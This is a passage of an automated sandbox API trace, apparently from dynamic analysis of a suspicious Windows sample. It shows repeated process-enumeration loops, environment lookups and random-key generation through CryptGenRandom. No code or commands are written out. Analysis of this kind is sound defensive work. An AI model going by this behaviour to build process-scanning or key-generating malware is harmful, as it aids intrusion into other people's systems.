dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.154] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhtop32bit.exe")) returned 1 [0107.155] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0107.156] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.157] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0107.158] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.159] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0107.161] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.165] Process32NextW (in: hSnapshot=0x2f8, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0107.166] CloseHandle (hObject=0x2f8) returned 1 [0107.166] GetCurrentThread () returned 0xfffffffe [0107.166] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0107.272] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x110 [0107.276] Process32FirstW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.277] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.278] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.279] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.280] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.280] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.281] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.282] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.282] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.283] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.284] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.284] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.285] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.286] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.286] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.287] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.288] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.288] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.289] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.290] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.291] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.291] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.292] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.293] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.293] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="expense.exe")) returned 1 [0107.294] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="restructuring.exe")) returned 1 [0107.295] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="seem.exe")) returned 1 [0107.296] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="und-rica.exe")) returned 1 [0107.296] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fighters.exe")) returned 1 [0107.297] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x20c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="dimensions flyer.exe")) returned 1 [0107.298] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="des.exe")) returned 1 [0107.298] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="casting.exe")) returned 1 [0107.299] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="morrison-consult.exe")) returned 1 [0107.300] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="targeted.exe")) returned 1 [0107.301] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="modify_vital_consider.exe")) returned 1 [0107.301] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omega hiv.exe")) returned 1 [0107.302] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="strike_grid_ringtones.exe")) returned 1 [0107.303] Process32NextW (in: hSnapshot=0x110, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reload.exe")) returned 1 [0107.633] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x310 [0107.638] Process32FirstW (in: hSnapshot=0x310, lppe=0x8cfb04 | out: lppe=0x8cfb04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 212 os_tid = 0xe78 [0104.985] GetLastError () returned 0x57 [0104.985] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x8, Size=0x364) returned 0x6eec38 [0104.986] SetLastError (dwErrCode=0x57) [0104.986] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0104.986] GetLastError () returned 0x57 [0104.986] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0 [0104.987] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0104.988] GetLastError () returned 0x57 [0104.988] LoadLibraryExW (lpLibFileName="ext-ms-win-kernel32-package-current-l1-1-0", hFile=0x0, dwFlags=0x0) returned 0x0 [0104.988] GetCurrentThreadId () returned 0xe78 [0104.988] GetCurrentThreadId () returned 0xe78 [0104.988] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b888 [0104.988] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8a8 [0104.988] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 0 [0104.988] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.988] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6eefc0 [0104.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e74c8 | out: hHeap=0x6d0000) returned 1 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x709df0 [0104.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eefc0 | out: hHeap=0x6d0000) returned 1 [0104.989] RtlTryEnterCriticalSection (CriticalSection=0xcce05c) returned 0 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x78) returned 0x6e11e8 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fc8 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b030 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b068 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b0a0 [0104.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709fc8 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e85c0 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b0d8 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x7099e8 [0104.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x48) returned 0x6e94d0 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6effa8 [0104.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b0d8 | out: hHeap=0x6d0000) returned 1 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6eefc0 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8598 [0104.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e94d0 | out: hHeap=0x6d0000) returned 1 [0104.989] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20023) returned 0x70a650 [0104.990] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x70a660, nSize=0xffff | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef028 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a680 [0104.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eefc0 | out: hHeap=0x6d0000) returned 1 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6eefc0 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6e94d0 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd8) returned 0x72a718 [0104.990] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a680 | out: hHeap=0x6d0000) returned 1 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a680 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a7f8 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a850 [0104.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x138) returned 0x72a8a8 [0104.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a718 | out: hHeap=0x6d0000) returned 1 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a6d8 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x72a730 [0104.991] GetEnvironmentVariableW (in: lpName="SYSTEMDRIVE", lpBuffer=0x27ff974, nSize=0x32 | out: lpBuffer="C:") returned 0x2 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8570 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8548 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c8) returned 0x72a9e8 [0104.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a8a8 | out: hHeap=0x6d0000) returned 1 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8638 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b0d8 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8980 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x30) returned 0x72b110 [0104.991] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1d4e3) returned 0x75ed38 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x130) returned 0x72a8a8 [0104.991] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e89a8 [0104.991] CryptAcquireContextA (in: phProv=0x27ff8e8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x27ff8e8*=0x77c228) returned 1 [0104.993] CryptGenRandom (in: hProv=0x709260, dwLen=0x20, pbBuffer=0x6e89a8 | out: pbBuffer=0x6e89a8) returned 1 [0104.993] CryptReleaseContext (hProv=0x77c228, dwFlags=0x0) returned 1 [0104.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e89a8 | out: hHeap=0x6d0000) returned 1 [0104.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e89a8 [0104.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x120c) returned 0x77c4c8 [0104.993] QueryPerformanceCounter (in: lpPerformanceCount=0x27ff840 | out: lpPerformanceCount=0x27ff840*=22494839855) returned 1 [0104.993] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27ff880 | out: lpSystemTimeAsFileTime=0x27ff880*(dwLowDateTime=0x2c2f3300, dwHighDateTime=0x1d62227)) [0104.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e74c8 [0104.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fc8 [0104.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x709fe8 [0104.993] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b8b8 [0104.993] GetLastError () returned 0x0 [0104.993] SetLastError (dwErrCode=0x0) [0104.993] GetLastError () returned 0x0 [0104.994] SetLastError (dwErrCode=0x0) [0104.994] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fc8 | out: hHeap=0x6d0000) returned 1 [0104.994] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709fe8 | out: hHeap=0x6d0000) returned 1 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72b148 [0104.994] GetLastError () returned 0x0 [0104.994] SetLastError (dwErrCode=0x0) [0104.994] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b148 | out: hHeap=0x6d0000) returned 1 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72b148 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x60) returned 0x6ef090 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e89d0 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0018 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8c8 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8a48 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df140 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8d8 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6e8a70 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x10) returned 0x6df128 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8a98 [0104.994] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0120 [0104.994] GetLastError () returned 0x0 [0104.994] SetLastError (dwErrCode=0x0) [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b148 | out: hHeap=0x6d0000) returned 1 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x6e8ac0 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x72bbf8 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b8e8 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b8f8 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b908 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8f8 | out: hHeap=0x6d0000) returned 1 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 0x72b8f8 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b908 | out: hHeap=0x6d0000) returned 1 [0104.995] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b8e8 | out: hHeap=0x6d0000) returned 1 [0104.995] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8) returned 